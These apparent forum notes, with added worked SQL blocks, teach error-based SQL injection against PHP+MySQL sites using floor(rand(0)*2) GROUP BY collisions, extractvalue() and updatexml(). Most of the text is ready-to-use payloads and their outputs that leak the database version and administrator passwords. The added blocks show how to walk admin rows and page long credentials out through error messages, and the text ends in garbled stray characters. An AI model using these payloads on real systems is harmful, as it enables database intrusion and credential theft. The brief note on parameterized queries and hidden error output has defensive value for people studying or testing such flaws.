Posting some old notes. When MySQL fails to execute a statement it raises an error message, and PHP+MySQL sites often print that error straight onto the page. By building queries that fail in a controlled way, the error text itself can be made to carry specific data; three ways of doing that follow. All three depend on the raw database error reaching the client: an application that parameterizes its queries, or that logs errors instead of echoing them (display_errors off in PHP), leaks nothing this way.
Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Errors via floor()

The following payloads can be used (the first form was missing its opening parenthesis in the original notes; the working form is the one in the examples below):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Why this works: rand(0) is seeded, so floor(rand(0)*2) produces the same sequence every time (0, 1, 1, 0, 1, 1, ...). MySQL evaluates the GROUP BY key once to look it up in its temporary table and again when it inserts a key that was not found, so by the third row the freshly computed key collides with one already inserted and the statement fails with error 1062. The message quotes the duplicate key, and with it whatever was concatenated in front of the digit. The table being grouped therefore needs at least three rows: information_schema.tables always has plenty, and the second form builds exactly three with the union.
Example:
First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement forces the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked. Note that the trailing 1 is the floor(rand(0)*2) digit, not part of the value: the version is 5.1.33-community-log. To retrieve other data, replace the version() call with any other expression, for example the administrator's password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Again the password is admin888; the final 1 comes from floor(). The inner subquery must return a single row (hence where id = 1 or limit 1); otherwise MySQL raises "Subquery returns more than 1 row" instead, which leaks nothing.
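A worked replay of the floor() trick, added here as an example and not part of the original notes. It rebuilds the test database from the DESCRIBE output above; the row values are constructed (only pass = admin888 for id 1 comes from the page's own error messages), and the second admin row is deliberately long. Beyond the single case above it shows the three-row requirement, walking rows with LIMIT offset,1, and paging a long value with substr().

```sql
-- Added example (not from the original notes): rebuild the page's test
-- database so the floor() trick can be replayed end to end.
-- All row values below are constructed except pass='admin888' for id 1,
-- which the page's own error messages leak.
CREATE DATABASE IF NOT EXISTS test;
USE test;
CREATE TABLE admin (
  id   INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user VARCHAR(50) NOT NULL,
  pass VARCHAR(50) NOT NULL
);
CREATE TABLE article (
  id      INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  title   VARCHAR(50) NOT NULL,
  content VARCHAR(50) NOT NULL
);
INSERT INTO admin (user, pass) VALUES
  ('admin',  'admin888'),
  ('editor', 'a-deliberately-long-password-0123456789abcdefghijklmnopqrstuv');  -- constructed, 2nd row
INSERT INTO article (title, content) VALUES ('test', 'do it');

-- Why floor(rand(0)*2) works: the seed fixes the sequence, so the first
-- six values come out as 0,1,1,0,1,1 on every run. MySQL recomputes the
-- GROUP BY key when inserting a missing key, so by the third grouped row
-- the inserted key collides with one already in the temporary table.
SELECT floor(rand(0)*2) AS k FROM information_schema.tables LIMIT 6;

-- The check a practitioner wants: the grouped source needs >= 3 rows.
SELECT count(*) FROM (SELECT 1 UNION SELECT 2) t
 GROUP BY concat(version(), floor(rand(0)*2));          -- two rows: no collision, no error
SELECT count(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) t
 GROUP BY concat(version(), floor(rand(0)*2));          -- three rows: ERROR 1062 on 'group_key'

-- Walking the admin table one row per request with LIMIT offset,1.
-- The inner SELECT must return exactly one row, otherwise MySQL raises
-- "Subquery returns more than 1 row" and leaks nothing.
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM
  (SELECT count(*),
          concat((SELECT concat(user, 0x3a, pass) FROM admin LIMIT 1,1),  -- 0x3a = ':'
                 floor(rand(0)*2)) x
   FROM information_schema.tables GROUP BY x) a);

-- Long values: the duplicate-entry text is truncated (commonly at 64
-- characters), so page through them with substr(value, start, len) and
-- strip the trailing floor() digit from each page.
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM
  (SELECT count(*),
          concat(substr((SELECT pass FROM admin LIMIT 1,1), 1, 40), floor(rand(0)*2)) x
   FROM information_schema.tables GROUP BY x) a);
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM
  (SELECT count(*),
          concat(substr((SELECT pass FROM admin LIMIT 1,1), 41, 40), floor(rand(0)*2)) x
   FROM information_schema.tables GROUP BY x) a);
```

Each of the failing statements reports the concatenated key in its "Duplicate entry" message; the two-row GROUP BY is the control case that shows the collision, not the injection, is what raises the error.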
2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

extractvalue(xml, xpath) exists from MySQL 5.1.5. The 0x5c is a backslash; prefixing it makes the second argument invalid XPath, so MySQL rejects it and quotes the string in the error. Without a prefix a value that happens to be valid XPath (a bare number, or a name such as admin) is simply evaluated and nothing is leaked. The error text shows at most 32 characters of the expression, so longer values have to be read in pieces with substr().
3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

updatexml(xml, xpath, new_xml) fails in exactly the same way as extractvalue when its XPath argument is invalid; 0x5e24 is the two-byte marker '^$', placed on both sides here so the leaked value is easy to pick out of the page. The same 32-character limit on the error text applies.
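The XPath-function trick carried a little further, as an added example that is not from the original notes. It recreates a minimal admin table (constructed data; only admin888 is from the page) and shows the check and the caveat a practitioner wants: a marker byte that guarantees the XPath is invalid, the 32-character window of the XPATH error text, paging with substr(), and group_concat() to pull several rows per request.

```sql
-- Added example (not from the original notes). Minimal rebuild of the
-- page's admin table; the second row is constructed to be long.
CREATE TABLE IF NOT EXISTS admin (
  id   INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user VARCHAR(50) NOT NULL,
  pass VARCHAR(50) NOT NULL
);
INSERT INTO admin (user, pass) VALUES
  ('admin',  'admin888'),
  ('editor', 'a-deliberately-long-password-0123456789abcdefghijklmnopqrstuv');

-- A value that is itself valid XPath (an element name like admin888)
-- is evaluated quietly: no error, nothing leaked.
SELECT extractvalue(1, 'admin888');

-- A marker byte makes the expression invalid XPath on every input.
-- 0x7e is '~', which is easier to spot in a page than '\' or '^$'.
SELECT extractvalue(1, concat(0x7e, (SELECT pass FROM admin LIMIT 1)));

-- Caveat: the XPATH error text carries at most 32 characters, marker
-- included, so a long value is read 31 characters at a time.
SELECT extractvalue(1, concat(0x7e, substr((SELECT pass FROM admin LIMIT 1,1), 1, 31)));
SELECT extractvalue(1, concat(0x7e, substr((SELECT pass FROM admin LIMIT 1,1), 32, 31)));

-- updatexml() behaves the same; group_concat() avoids the single-row
-- restriction on the inner subquery, still within the 32-char window.
SELECT updatexml(1, concat(0x7e, (SELECT group_concat(user, 0x3a, pass) FROM admin)), 1);

-- The same paging applies to group_concat() output.
SELECT updatexml(1, concat(0x7e, substr((SELECT group_concat(user, 0x3a, pass) FROM admin), 32, 31)), 1);
```

In an injection the SELECT ... FROM article WHERE id = 1 AND prefix from the sections above goes in front of each extractvalue()/updatexml() call; they are shown bare here so the behaviour of the functions themselves is visible.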
That's all; thanks, foreign guys.
5 j% d% ]$ o7 e# \7 S5 u $ e. p( r/ I. k1 [) {2 f' p
& R3 x4 i' W) q! L
|